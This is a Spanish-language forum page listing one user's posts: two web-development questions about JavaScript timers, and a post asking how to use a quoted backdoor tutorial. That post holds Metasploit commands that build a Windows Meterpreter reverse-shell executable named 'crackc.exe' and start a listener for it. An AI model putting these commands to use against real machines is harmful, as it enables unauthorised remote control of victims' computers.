elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


  Mostrar Mensajes
Páginas: [1]
1  Programación / Desarrollo Web / Agregar un setTimeOut a ese codigo en: 25 Julio 2015, 21:39 pm
hola quisiera que me ayudaran a agregar este settimeout

Código
  1. setTimeout('window.close()',5000)

dentro de este codigo:

Código
  1. <body onLoad="javascript: window.opener.location.href = 'paginafinal.html'; window.close(); >

yo lo habia agregado asi:

Código
  1. <body onLoad="javascript: window.opener.location.href = 'paginaFinal.html'; setTimeout('window.close()',5000)">

Mod: No hacer doble post, esto no es java


 pero no me funciono como quiero, quiero es que cuando se termine el tiempo se ejeute el codigo, pero cuando lo pongo, sucede que el pop up se queda cargando el tiempo mienrtas la pagina padre se esta redireccionando, y lo que quiero es que se haga una cosa a la ves, primero el tiempo luego si que me mande a la pagina padre y haga el resto

Muchas Gracias.


Mod: Obligatorio el uso de etiquetas GeSHi.
2  Programación / Desarrollo Web / Ayuda con esta evento onload en: 20 Julio 2015, 18:08 pm
Tengo este codigo

Código
  1. <script>
  2. function desaparecer()
  3. {
  4.        document.getElementById('mi_capa').style.display = 'none';
  5. }  
  6. </script>
Código
  1. <body onload="setTimeout('desaparecer()', 1000)">
  2.  
  3. <div class='mi_capa' id='mi_capa' style='z-index:99999; position:fixed; top: 0; left: 0; overflow:visible; width:100%; height:100%; background: #F4F8F9;'>
  4. <div style='width:600px; height:400px; position:absolute; top:50%; left:50%; margin-left:-300px; margin-top:-200px; padding:100px 30px 0px 0px; color:#000000; font-size:20px; line-height:20px; text-align:center;'>
  5.  
  6. <form action="validar-password.php" method="post">
  7. Escribe una clave:
  8. <input type=password name="clave">
  9. <input type="submit" value="Enviar">
  10. </form>
  11. </div></div>


lo que quiero es que cuando pulse el  botón, se ejecute la acion del body onload sin nesecidad de que sea con el tiempo, es decier que cuando pulse el boton, el body me carge, llevo muchi tiempo intentando por no he podido por que en el form hay una action y no se que ponerle para que el body onload se ejecute.

Gracias por su ayuda

Mod: Obligatorio el uso de etiquetas GeSHi.
3  Seguridad Informática / Bugs y Exploits / ayuda con este xploit en: 20 Julio 2015, 04:12 am
Hola gente, soy nuevo en este foro y tambien en el tema, me he interesado en esto ya que estaba navegando en cierta web y me encontre con un post llamado algo como entrar en una pc con backdoor, resulta que entré en el post y me encontré con esto:

Hoy vamos a aprender a como hackear una computadora con backdoor
usaremos lo siguientes commandos:

Primero Haremos con la IP y el puerto con el nombre de la carpeta
msfpayload windows/meterpreter/reverse_tcp LHOST=(IP) LPORT=4444 x > crackc.exe


Usaremos el exploit

use exploit/multi/handler
set LHOST (IP)
set LPORT 4444
exploit


mi pregunta es:

-primero que todo como se utilizan los comandos del primer parrafo, no creo que sea en 
CMD (uso win 7), entonces con que programa se usa el codigo, y eso de hacer la carpeta con el nombre del puerto y la IP, no entiendo un carajo (obio se que es una ip y un puerto, lo que no entiendo es eso de hacer la carpeta)

-luego de eso, la siguiente pregunta es, como ejecuto ese xploit, es que no entiendo nada sobre eso, pero quiero quiero hacerlo


Espero que no ofenda a nadie ya que mi conocimiento sobre xploits y bugs es muy poco ya que me dedico solo a webs y SQL.

Gracias por su ayuda :D
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines